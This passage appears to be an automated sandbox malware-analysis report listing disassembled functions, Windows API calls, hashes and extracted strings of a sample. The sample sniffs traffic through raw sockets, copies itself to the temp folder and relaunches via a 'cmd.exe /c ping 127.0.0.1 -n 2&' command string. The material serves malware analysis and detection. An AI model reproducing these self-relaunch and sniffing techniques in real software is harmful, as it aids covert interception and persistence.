                                                        • Instruction Fuzzy Hash: 0AE04F673041646AE22026B96DC995B6A6CC2C57EAB110537FB43F219094748C0545B9
                                                        Function 00402B5A Relevance: 4.5, APIs: 3, Instructions: 29networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 68 402b5a-402b7a WSAStartup 69 402ba3 WSAGetLastError 68->69 70 402b7c-402b82 68->70 73 402ba9-402bac 69->73 71 402b84-402b90 70->71 72 402b9d WSACleanup 70->72 71->72 74 402b92-402b9b 71->74 72->69 74->73
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: CleanupErrorLastStartup
                                                        • String ID:
                                                        • API String ID: 286295645-0
                                                        • Opcode ID: b0ec8336bf00a6052941da9178b3fceddae8ddc46f726d68ca548fb70960ad9d
                                                        • Instruction ID: 2be7791f72972009722b799a77b565cb98efc3fc237316151d06e583dd982ed8
                                                        • Opcode Fuzzy Hash: b0ec8336bf00a6052941da9178b3fceddae8ddc46f726d68ca548fb70960ad9d
                                                        • Instruction Fuzzy Hash: 1FF0EC715002186FDB206F35DE1CAD77BF89B0C355F005476E54AE3181D67468458758
                                                        Function 004016DF Relevance: 4.5, APIs: 3, Instructions: 12fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 75 4016df-401703 #561 __p___argv DeleteFileA
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #561DeleteFile__p___argv
                                                        • String ID:
                                                        • API String ID: 84669193-0
                                                        • Opcode ID: 7c176645d386521af702be36d08a2a7746dee0815ea9a0421c38c726cf202088
                                                        • Instruction ID: eae00a7dc5a7c054ffd0e57f273fac8e4c6ac782b343249d42dd52938cd82e5c
                                                        • Opcode Fuzzy Hash: 7c176645d386521af702be36d08a2a7746dee0815ea9a0421c38c726cf202088
                                                        • Instruction Fuzzy Hash: 98D0C9B42101219FC3502B95EE09A447BA0AF85741B0140BAF705B72A0DBB04C008B58
                                                        Function 004030AE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 76 4030ae-4030c3 #1576
                                                        APIs
                                                        • #1576.MFC42(?,?,?,V0@,00403056,00000000,?,0000000A), ref: 004030BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #1576
                                                        • String ID: V0@
                                                        • API String ID: 1976119259-1055587443
                                                        • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                        • Instruction ID: 091081438a8891efaa48dbd6cf97df1c67080aae43ea6bdf83243b43297a0175
                                                        • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                        • Instruction Fuzzy Hash: 51B00836018396ABCB02DF91880192ABEA6BB98705F488C1DB2A1140A187768538EB16

                                                        Non-executed Functions

                                                        Function 0040229F Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 165windowtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 004022A4
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 0040290F
                                                          • Part of subcall function 004028B1: inet_ntoa.WS2_32(?), ref: 00402920
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 00402927
                                                          • Part of subcall function 004028B1: inet_ntoa.WS2_32(?), ref: 00402932
                                                          • Part of subcall function 004028B1: strncpy.MSVCRT ref: 00402939
                                                          • Part of subcall function 004028B1: sprintf.MSVCRT ref: 0040299E
                                                          • Part of subcall function 004028B1: sprintf.MSVCRT ref: 004029A8
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00402305
                                                        • #540.MFC42 ref: 0040230E
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00402323
                                                        • #3998.MFC42(00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402342
                                                        • #6907.MFC42(?,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402352
                                                        • #6907.MFC42(?,00000002,?,?,00000001,?,00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 00402362
                                                        • #2818.MFC42(?,%d/%d,?,?,?,00000002,?,?,00000001,?,00000001,00000000,?,00000000,00000000,00000000), ref: 00402376
                                                        • #6907.MFC42(?,00000003,?,00000000), ref: 00402388
                                                        • GetSystemTime.KERNEL32(?,?,00000003,?,00000000), ref: 00402391
                                                        • #2818.MFC42(?,%2.2d-%2.2d %2.2d:%2.2d:%2.2d,?,?,?,?,?), ref: 004023B9
                                                        • #6907.MFC42(?,?,?), ref: 004023CB
                                                        • #6007.MFC42(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004023DD
                                                        • #823.MFC42(00000008,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004023E8
                                                        • #823.MFC42(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 00402408
                                                        • memcpy.MSVCRT(00000000,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040241B
                                                        • #6007.MFC42(?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00402432
                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00402449
                                                        • #800.MFC42 ref: 00402456
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #6907$strncpy$#2818#6007#823CriticalSectioninet_ntoasprintf$#3998#540#800EnterH_prologLeaveMessageSendSystemTimememcpy
                                                        • String ID: %2.2d-%2.2d %2.2d:%2.2d:%2.2d$%d/%d
                                                        • API String ID: 53958731-669394826
                                                        • Opcode ID: 1dcc0767c7c356694aae18455bea49362ef47f3eb0e9af8e309e7b155486fb36
                                                        • Instruction ID: aa3e698a986a9efcd30e7cd5d6354eb5ceda86bede962053babdd167d9a98621
                                                        • Opcode Fuzzy Hash: 1dcc0767c7c356694aae18455bea49362ef47f3eb0e9af8e309e7b155486fb36
                                                        • Instruction Fuzzy Hash: 935148B2900209AEDF119FA5CD4AEEFBB7DFB48308F00442AF605B61D1D6B95D04CB64
                                                        Function 0040271C Relevance: 18.1, APIs: 12, Instructions: 109networkthreadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 149 40271c-40273c socket 150 402742-402757 gethostname 149->150 151 40280f-402815 WSAGetLastError 149->151 150->151 153 40275d-4027ab gethostbyname htons memcpy bind 150->153 152 402848-40284c 151->152 153->151 154 4027ad-4027e0 setsockopt * 2 153->154 154->151 155 4027e2-40280d WSAIoctl 154->155 155->151 156 402817-40282f CreateThread 155->156 157 402831-402844 closesocket 156->157 158 402846 156->158 157->152 158->152
                                                        APIs
                                                        • socket.WS2_32(00000002,00000003,00000000), ref: 00402730
                                                        • gethostname.WS2_32(?,00000100), ref: 0040274E
                                                        • gethostbyname.WS2_32(?), ref: 00402764
                                                        • htons.WS2_32(?), ref: 00402779
                                                        • memcpy.MSVCRT(?,?,?), ref: 00402791
                                                        • bind.WS2_32(?,00000002,00000010), ref: 004027A2
                                                        • setsockopt.WS2_32(?,0000FFFF,?,?,?), ref: 004027C9
                                                        • setsockopt.WS2_32(?,00000000,00000002,?,?), ref: 004027DB
                                                        • WSAIoctl.WS2_32(?,98000001,?,?,?,00000028,?,00000000,00000000), ref: 00402804
                                                        • WSAGetLastError.WS2_32 ref: 0040280F
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000026B0,?,00000000,00000000), ref: 00402824
                                                        • closesocket.WS2_32(?), ref: 00402838
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: setsockopt$CreateErrorIoctlLastThreadbindclosesocketgethostbynamegethostnamehtonsmemcpysocket
                                                        • String ID:
                                                        • API String ID: 4186165289-0
                                                        • Opcode ID: ab5857ac9cbc0614391de9fc2817350c261bf381e728ef5c6a56ec0117ced1b9
                                                        • Instruction ID: cc647fa9d97eb8ab40f50e3a18fc5453a93f7f03a17443a7d33be6df37dc61fd
                                                        • Opcode Fuzzy Hash: ab5857ac9cbc0614391de9fc2817350c261bf381e728ef5c6a56ec0117ced1b9
                                                        • Instruction Fuzzy Hash: DF3160B6500604AFD7209FA4DD49F9BBBB8EF84720F10862AF625E61E0D7B49944CB54
                                                        Function 00402138 Relevance: 13.6, APIs: 9, Instructions: 63windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
                                                        • String ID:
                                                        • API String ID: 1397574227-0
                                                        • Opcode ID: 1ec0889933b8568e71d179df5b286e334d8a5b22727fd9a6730dc2e2a4000510
                                                        • Instruction ID: ef0e762d43f9ba135a21ed7adfdda79f425eb601d2121b69b903fd342b625570
                                                        • Opcode Fuzzy Hash: 1ec0889933b8568e71d179df5b286e334d8a5b22727fd9a6730dc2e2a4000510
                                                        • Instruction Fuzzy Hash: 95115472610219AFCB10ABB9DE4DEAE77B9FB84340F040139B646E70E0DAB4AD04CB54
                                                        Function 004028B1 Relevance: 54.5, APIs: 24, Strings: 7, Instructions: 226networkstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: sprintf$htons$strncpy$inet_ntoa$htonlmemcpystrcpy
                                                        • String ID: %s%c$%s:%d$FSRPAU$FSRPAU$Len=%d$flag:$type=%d,code=%d
                                                        • API String ID: 3753906667-237590085
                                                        • Opcode ID: ba62efef13005b08d425294af8eda39d72da486267677ef8ad29d67723068545
                                                        • Instruction ID: a53d3f022a17ab101e70b7c90ccdcaa7e2f0d08fd5b2c767e99d7cb1b96ba65e
                                                        • Opcode Fuzzy Hash: ba62efef13005b08d425294af8eda39d72da486267677ef8ad29d67723068545
                                                        • Instruction Fuzzy Hash: 0171D172900248AEDB11DFA8CC44EEF7BBCAF48300F044466FA44F7191D678EA54CBA8
                                                        Function 00401160 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 157COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 97 401160-4011b2 _EH_prolog #537 * 2 #540 98 4011b4-4011cb #2818 97->98 99 4011ea-40120c #6199 #2614 97->99 100 4011da-4011e8 #939 98->100 101 4011cd-4011d5 #941 98->101 102 401211-401219 99->102 103 40120e 99->103 100->98 100->99 101->100 104 4012f8-401346 #6199 * 2 #800 * 3 102->104 105 40121f-401224 102->105 103->102 106 401227-40122d 105->106 107 401233-401252 #2818 106->107 108 4012bd 106->108 110 401261-401271 #939 107->110 111 401254-40125c #941 107->111 109 4012c1-4012ca 108->109 112 4012e3-4012e7 109->112 113 4012cc-4012de #941 * 2 109->113 114 401273-40127c 110->114 115 401295-4012a4 #2818 110->115 111->110 116 4012f5 112->116 117 4012e9-4012ef 112->117 113->112 114->115 118 40127e-401293 #2818 114->118 119 4012a5-4012b5 #939 115->119 116->104 117->105 117->116 118->119 119->106 120 4012bb 119->120 120->109
                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401165
                                                        • #537.MFC42(00406598), ref: 0040117E
                                                        • #537.MFC42(00406598,00406598), ref: 0040118B
                                                        • #540.MFC42(00406598,00406598), ref: 00401197
                                                        • #2818.MFC42(?,%6.6X,00000000,00406598,00406598), ref: 004011BE
                                                        • #941.MFC42(00406044), ref: 004011D5
                                                        • #939.MFC42(?), ref: 004011E1
                                                        • #6199.MFC42(?,00406598,00406598), ref: 004011F0
                                                        • #2614.MFC42(?,00406598,00406598), ref: 004011F8
                                                        • #2818.MFC42(?,%2.2X ,?,?,00406598,00406598), ref: 00401247
                                                        • #941.MFC42(00406038), ref: 0040125C
                                                        • #939.MFC42(?), ref: 00401268
                                                        • #2818.MFC42(?,00406034,?,?), ref: 0040128B
                                                        • #2818.MFC42(?,00406030,?), ref: 0040129E
                                                        • #939.MFC42(?,?), ref: 004012AC
                                                        • #941.MFC42(00406044,?,00406598,00406598), ref: 004012D5
                                                        • #941.MFC42(00406044,00406044,?,00406598,00406598), ref: 004012DE
                                                        • #6199.MFC42(?,?,00406598,00406598), ref: 00401301
                                                        • #6199.MFC42(?,?,?,00406598,00406598), ref: 0040130F
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 0040131B
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 00401327
                                                        • #800.MFC42(?,?,?,00406598,00406598), ref: 00401333
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: #2818#941$#6199#800#939$#537$#2614#540H_prolog
                                                        • String ID: %2.2X $%6.6X$D`@
                                                        • API String ID: 3308870338-4221501666
                                                        • Opcode ID: 20f37d9169c0ec6644e067ea3bad11262685dea0dac38ba345f792653d56fa1a
                                                        • Instruction ID: b9ffc5d633f4d1405bf7982aaa5686ba721c81fb604f9ffe8360b73c1c5d8c85
                                                        • Opcode Fuzzy Hash: 20f37d9169c0ec6644e067ea3bad11262685dea0dac38ba345f792653d56fa1a
                                                        • Instruction Fuzzy Hash: 67516072C0011A9ADF05EBA5C986AEEB7B8AF65308F10407FE502B71D2D77C5E09C769
                                                        Function 00401867 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 151sleepfileprocessCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • #823.MFC42(00100000), ref: 00401879
                                                        • memset.MSVCRT ref: 00401888
                                                        • __p___argv.MSVCRT ref: 00401897
                                                          • Part of subcall function 004017B2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004017ED
                                                        • __p___argv.MSVCRT ref: 004018B9
                                                          • Part of subcall function 004017B2: memset.MSVCRT ref: 00401814
                                                          • Part of subcall function 004017B2: ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 0040182C
                                                          • Part of subcall function 004017B2: memcpy.MSVCRT(?,?,?), ref: 00401847
                                                          • Part of subcall function 004017B2: CloseHandle.KERNEL32(?), ref: 00401859
                                                        • Sleep.KERNEL32(00000064), ref: 004018CE
                                                        • GetTickCount.KERNEL32 ref: 00401906
                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 00401936
                                                        • wsprintfA.USER32 ref: 00401953
                                                        • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00401973
                                                        • #823.MFC42(?), ref: 0040197F
                                                        • Sleep.KERNEL32(00000064), ref: 0040198A
                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004019A0
                                                        • Sleep.KERNEL32(00000064), ref: 004019A4
                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004019B4
                                                        • CloseHandle.KERNEL32(?), ref: 004019B9
                                                        • #825.MFC42(?), ref: 004019C2
                                                        • #825.MFC42(?,?), ref: 004019CA
                                                        • __p___argv.MSVCRT ref: 004019E7
                                                        • wsprintfA.USER32 ref: 00401A04
                                                        • WinExec.KERNEL32(?,00000000), ref: 00401A15
                                                        • Sleep.KERNEL32(000001F4), ref: 00401A20
                                                        • ExitProcess.KERNEL32 ref: 00401A24
                                                        Strings
                                                        • cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 004019FE
                                                        • %s\%s.exe, xrefs: 0040194D
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: File$Sleep$__p___argv$#823#825CloseCreateHandleWritememsetwsprintf$CountExecExitPathProcessReadTempTickmemcpy
                                                        • String ID: %s\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
                                                        • API String ID: 4283993690-2816570591
                                                        • Opcode ID: a491cdb6d37c63822b2f5e0dabab34744de7fedee835b1f0fc382f0816b84e4c
                                                        • Instruction ID: 647a47b4171ebbf043bbf0605c80f25e9859b4608e82af673633275921c822a3
                                                        • Opcode Fuzzy Hash: a491cdb6d37c63822b2f5e0dabab34744de7fedee835b1f0fc382f0816b84e4c
                                                        • Instruction Fuzzy Hash: EB515EB2900109BFEB11ABE4DD49EDEBB79EF88300F1004B6F704B61A1DB755A548F69
                                                        Function 00401F19 Relevance: 36.2, APIs: 24, Instructions: 151windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • _EH_prolog.MSVCRT ref: 00401F1E
                                                        • #4710.MFC42 ref: 00401F2B
                                                        • GetSystemMenu.USER32(?,00000000), ref: 00401F36
                                                        • #2863.MFC42(00000000), ref: 00401F3D
                                                        • #540.MFC42(00000000), ref: 00401F4C
                                                        • #4160.MFC42(00000065,00000000), ref: 00401F5B
                                                        • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401F79
                                                        • AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401F85
                                                        • #800.MFC42(00000065,00000000), ref: 00401F90
                                                        • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401FB1
                                                        • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401FBF
                                                        • #823.MFC42(00000128), ref: 00401FC6
                                                        • #2086.MFC42(00000082), ref: 00401FFE
                                                        • #6215.MFC42(00000005,00000082), ref: 0040200F
                                                        • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00402021
                                                        • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 00402033
                                                        • SendMessageA.USER32(?,00001037,00000000,00000000), ref: 00402042
                                                        • SendMessageA.USER32(?,00001036,00000000,00000000), ref: 00402050
                                                        • #3996.MFC42(00000000,00406328,00000000,00000028,000000FF), ref: 00402065
                                                        • #3996.MFC42(00000001,00406320,00000000,0000008C,000000FF,00000000,00406328,00000000,00000028,000000FF), ref: 0040207C
                                                        • #3996.MFC42(00000002,00406318,00000000,0000008C,000000FF,00000001,00406320,00000000,0000008C,000000FF,00000000,00406328,00000000,00000028,000000FF), ref: 0040208E
                                                        • #3996.MFC42(00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF,00000001,00406320,00000000,0000008C,000000FF,00000000), ref: 004020A1
                                                        • #3996.MFC42(?,00406308,00000000,00000064,000000FF,00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF,00000001), ref: 004020B4
                                                        • InitializeCriticalSection.KERNEL32(?,?,00406308,00000000,00000064,000000FF,00000003,00406310,00000000,00000037,000000FF,00000002,00406318,00000000,0000008C,000000FF), ref: 004020C0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$#3996$Menu$Append$#2086#2863#4160#4710#540#6215#800#823CriticalH_prologInitializeSectionSystem
                                                        • String ID:
                                                        • API String ID: 2371848494-0
                                                        • Opcode ID: bf1e5139828ca2f7575a42d4d539cb4ceebe527546bc2a5505485d4eded29568
                                                        • Instruction ID: 22c113c14c16facbbd4b385fd64242b7c064b1ff54e6b864585585fb015a5088
                                                        • Opcode Fuzzy Hash: bf1e5139828ca2f7575a42d4d539cb4ceebe527546bc2a5505485d4eded29568
                                                        • Instruction Fuzzy Hash: 1B41E6B02407097BE6257B21CC86F6F769DFB84798F10063DF2A5761E1CBB96C008A68
                                                        Function 0040141D Relevance: 13.6, APIs: 9, Instructions: 75windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 159 40141d-40142c 160 401432-40147b SendMessageA * 3 159->160 161 4014ef-4014f4 159->161 162 4014ad-4014b5 160->162 163 40147d-4014ab SendMessageA * 3 160->163 164 4014e7-4014ee 162->164 165 4014b7-4014e5 SendMessageA * 3 162->165 163->162 164->161 165->164
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 0040144F
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040145E
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 0040146D
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040148D
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00401499
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004014AB
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004014C7
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004014D3
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004014E5
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1357477439.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358253424.0000000000406000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000005.00000002.1358284259.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_400000_mszcy.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: ad132ba9e6c3f3ed83570c34e1da1694867b5aed1bc06737ede0cc76b482b387
                                                        • Instruction ID: bb5fe5f59efd3e526b113e407ce870d9a6257fa786e4d84f1a1b66b5d905c888
                                                        • Opcode Fuzzy Hash: ad132ba9e6c3f3ed83570c34e1da1694867b5aed1bc06737ede0cc76b482b387
                                                        • Instruction Fuzzy Hash: 6B215B7161434DBFE721AF24CC80FABBFADFB44394F40052AB59852060C7716C28CBA1
                                                        Function 004014F5 Relevance: 13.6, APIs: 9, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageA.USER32(?), ref: 00401527
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401536
                                                        • SendMessageA.USER32(?,000000CE,00000000,00000000), ref: 00401545
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 00401565
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00401571
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 00401583
                                                        • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040159F
                                                        • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004015AB
                                                        • SendMessageA.USER32(?,000000B6,00000000,?), ref: 004015BD
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1356991141.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000005.00000002.1356970323.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
